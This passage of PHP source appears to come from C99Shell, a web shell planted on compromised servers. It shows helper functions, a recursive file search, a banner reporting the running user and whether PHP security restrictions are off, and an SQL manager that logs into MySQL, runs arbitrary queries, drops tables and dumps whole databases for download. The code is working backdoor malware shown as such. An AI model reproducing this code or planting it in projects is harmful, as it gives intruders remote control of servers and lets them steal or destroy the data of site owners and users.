   fwrite ($fp, $out);
   fclose ($fp);
  }
 }
 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 return $out;
}
}
if (!function_exists("mysql_buildwhere" ))
{
function mysql_buildwhere($array,$sep=" and",$functs=array())
{
 if (!is_array($array)) {$array = array();}
 $result = "";
 foreach($array as $k=>$v)
 {
  $value = "";
  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  $value .= "'".addslashes($v)."'";
  if (!empty($functs[$k])) {$value .= " )";}
  $result .= "`".$k."` = ".$value.$sep;
 }
 $result = substr($result,0,strlen($result)-strlen($sep));
 return $result;
}
}
if (!function_exists("mysql_fetch_all" ))
{
function mysql_fetch_all($query,$sock)
{
 if ($sock) {$result = mysql_query($query,$sock);}
 else {$result = mysql_query($query);}
 $array = array();
 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
 mysql_free_result($result);
 return $array;
}
}
if (!function_exists("mysql_smarterror" ))
{
function mysql_smarterror($type,$sock)
{
 if ($sock) {$error = mysql_error($sock);}
 else {$error = mysql_error();}
 $error = htmlspecialchars($error);
 return $error;
}
}
if (!function_exists("mysql_query_form" ))
{
function mysql_query_form()
{
 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 if ((!$submit) or ($sql_act))
 {
  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  if ($tbl_struct)
  {
   echo "<td valign=\"top\"><b>Fields:</b><br>";
   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
   echo "</td></tr></table>";
  }
 }
 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists("mysql_create_db" ))
{
function mysql_create_db($db,$sock="" )
{
 $sql = "CREATE DATABASE `".addslashes($db)."`;";
 if ($sock) {return mysql_query($sql,$sock);}
 else {return mysql_query($sql);}
}
}
if (!function_exists("mysql_query_parse" ))
{
function mysql_query_parse($query)
{
 $query = trim($query);
 $arr = explode (" ",$query);
 /*array array()
 {
  "METHOD"=>array(output_type),
  "METHOD1"...
  ...
 }
 if output_type == 0, no output,
 if output_type == 1, no output if no error
 if output_type == 2, output without control-buttons
 if output_type == 3, output with control-buttons
 */
 $types = array(
  "SELECT"=>array(3,1),
  "SHOW"=>array(2,1),
  "DELETE"=>array(1),
  "DROP"=>array(1)
 );
 $result = array();
 $op = strtoupper($arr[0]);
 if (is_array($types[$op]))
 {
  $result["propertions"] = $types[$op];
  $result["query"]  = $query;
  if ($types[$op] == 2)
  {
   foreach($arr as $k=>$v)
   {
    if (strtoupper($v) == "LIMIT" )
    {
     $result["limit"] = $arr[$k+1];
     $result["limit"] = explode(",",$result["limit"]);
     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
     unset($arr[$k],$arr[$k+1]);
    }
   }
  }
 }
 else {return FALSE;}
}
}
if (!function_exists("c99fsearch" ))
{
function c99fsearch($d)
{
 global $found;
 global $found_d;
 global $found_f;
 global $search_i_f;
 global $search_i_d;
 global $a;
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($f = readdir($h)) !== FALSE)
 {
  if($f != "." && $f != ".." )
  {
   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
   if (is_dir($d.$f))
   {
    $search_i_d++;
    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
    if (!is_link($d.$f)) {c99fsearch($d.$f);}
   }
   else
   {
    $search_i_f++;
    if ($bool)
    {
     if (!empty($a["text"]))
     {
      $r = @file_get_contents($d.$f);
      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
      else {$bool = strpos(" ".$r,$a["text"],1);}
      if ($a["text_not"]) {$bool = !$bool;}
      if ($bool) {$found[] = $d.$f; $found_f++;}
     }
     else {$found[] = $d.$f; $found_f++;}
    }
   }
  }
 }
 closedir($h);
}
}
if ($act == "gofile" ) {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
//Sending headers
@ob_start();
@ob_implicit_flush(0);
function onphpshutdown()
{
 global $gzipencode,$ft;
 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad" )))
 {
  $v = @ob_get_contents();
  @ob_end_clean();
  @ob_start("ob_gzHandler" );
  echo $v;
  @ob_end_flush();
 }
}
function c99shexit()
{
 onphpshutdown();
 exit;
}
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT" );
header("Last-Modified: ".gmdate("D, d M Y H:i:s" )." GMT" );
header("Cache-Control: no-store, no-cache, must-revalidate" );
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache" );
if (empty($tmpdir))
{
 $tmpdir = ini_get("upload_tmp_dir" );
 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
if (@ini_get("safe_mode" ) or strtolower(@ini_get("safe_mode" )) == "on" )
{
 $safemode = TRUE;
 $hsafemode = "<font color=red>ON (secure)</font>";
}
else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
$v = @ini_get("open_basedir" );
if ($v or strtolower($v) == "on" ) {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE" );
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
@ini_set("highlight.bg",$highlight_bg); //FFFFFF
@ini_set("highlight.comment",$highlight_comment); //#FF8000
@ini_set("highlight.default",$highlight_default); //#0000BB
@ini_set("highlight.html",$highlight_html); //#000000
@ini_set("highlight.keyword",$highlight_keyword); //#007700
@ini_set("highlight.string",$highlight_string); //#DD0000
if (!is_array($actbox)) {$actbox = array();}
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = urlencode($d);
?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST" ); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id" ),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath("." );} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "&nbsp;&nbsp;&nbsp;";
if (is_writable($d))
{
 $wd = TRUE;
 $wdt = "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
}
else
{
 $wd = FALSE;
 $wdt = "<font color=red>[ Read-Only ]</font>";
 echo "<b>".view_perms_color($d)."</b>";
}
if (is_callable("disk_free_space" ))
{
 $free = disk_free_space($d);
 $total = disk_total_space($d);
 if ($free === FALSE) {$free = 0;}
 if ($total === FALSE) {$total = 0;}
 if ($free < 0) {$free = 0;}
 if ($total < 0) {$total = 0;}
 $used = $total-$free;
 $free_percent = round(100/($total/$free),2);
 echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
}
echo "<br>";
$letters = "";
if ($win)
{
 $v = explode("\\",$d);
 $v = $v[0];
 foreach (range("a","z" ) as $letter)
 {
  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  if (!$bool) {$bool = is_dir($letter.":\\" );}
  if ($bool)
  {
   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\" )."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"" ).">[ ";
   if ($letter.":" != $v) {$letters .= $letter;}
   else {$letters .= "<font color=green>".$letter."</font>";}
   $letters .= " ]</a> ";
  }
 }
 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
}
if (count($quicklaunch) > 0)
{
 foreach($quicklaunch as $item)
 {
  $item[1] = str_replace("%d",urlencode($d),$item[1]);
  $item[1] = str_replace("%sort",$sort,$item[1]);
  $v = realpath($d.".." );
  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
 }
}
echo "</p></td></tr></table><br>";
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
if ($act == "" ) {$act = $dspact = "ls";}
if ($act == "sql" )
{
 $sql_surl = $surl."act=sql";
 if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
 if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
 if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
 $sql_surl .= "&";
 ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
 if ($sql_server)
 {
  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  $err = mysql_smarterror();
  @mysql_select_db($sql_db,$sql_sock);
  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
 }
 else {$sql_sock = FALSE;}
 echo "<b>SQL Manager:</b><br>";
 if (!$sql_sock)
 {
  if (!$sql_server) {echo "NO CONNECTION";}
  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
 }
 else
 {
  $sqlquicklaunch = array();
  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&" );
  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus" );
  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars" );
  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes" );
  $sqlquicklaunch[] = array("Logout",$surl."act=sql" );
  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ()." ) running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\" )</b><br>";
  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  echo "</center>";
 }
 echo "</td></tr><tr>";
 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
 else
 {
  //Start left panel
  if (!empty($sql_db))
  {
   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
   $result = mysql_list_tables($sql_db);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
    $c = 0;
    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0]." )</br></b>"; mysql_free_result($count); $c++;}
    if (!$c) {echo "No tables found in database.";}
   }
  }
  else
  {
   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
   $result = mysql_list_dbs($sql_sock);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
    $c = 0;
    $dbs = "";
    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
    echo "<option value=\"\">Databases (".$c." )</option>";
    echo $dbs;
   }
   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  }
  //End left panel
  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  //Start center panel
  $diplay = TRUE;
  if ($sql_db)
  {
   if (!is_numeric($c)) {$c = 0;}
   if ($c == 0) {$c = "no";}
   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db)." ).<br>";
   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
   echo "</b></center>";
   $acts = array("","dump" );
   if ($sql_act == "tbldrop" ) {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblempty" ) {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
   elseif ($sql_act == "tbldump" ) {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
   elseif ($sql_act == "tblcheck" ) {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tbloptimize" ) {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblrepair" ) {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblanalyze" ) {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "deleterow" ) {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
   elseif ($sql_tbl_act == "insert" )
   {
    if ($sql_tbl_insert_radio == 1)
    {
     $keys = "";
     $akeys = array_keys($sql_tbl_insert);
     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
     $values = "";
     $i = 0;
     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= " )";} $values .= ", "; $i++;}
     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
    elseif ($sql_tbl_insert_radio == 2)
    {
     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
     $result = mysql_query($sql_query) or print(mysql_smarterror());
     $result = mysql_fetch_array($result, MYSQL_ASSOC);
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
   }
   if ($sql_act == "query" )
   {
    echo "<hr size=\"1\" noshade>";
    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
   }
   if (in_array($sql_act,$acts))
   {
    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME" )."_".$sql_db."_".date("d-m-Y-H-i-s" ).".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
    if ($sql_act == "newtbl" )
    {
     echo "<b>";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
    }
    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
   }
   elseif ($sql_act == "dump" )
   {
    if (empty($submit))
    {
     $diplay = FALSE;
     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
     $v = join (";",$dmptbls);
     echo "<b>Only tables (explode \";\" )&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
     if ($dump_file) {$tmp = $dump_file;}
     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME" )."_".$sql_db."_".date("d-m-Y-H-i-s" ).".sql" );}
     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
     echo "</form>";
    }
    else
    {
     $diplay = TRUE;
     $set = array();
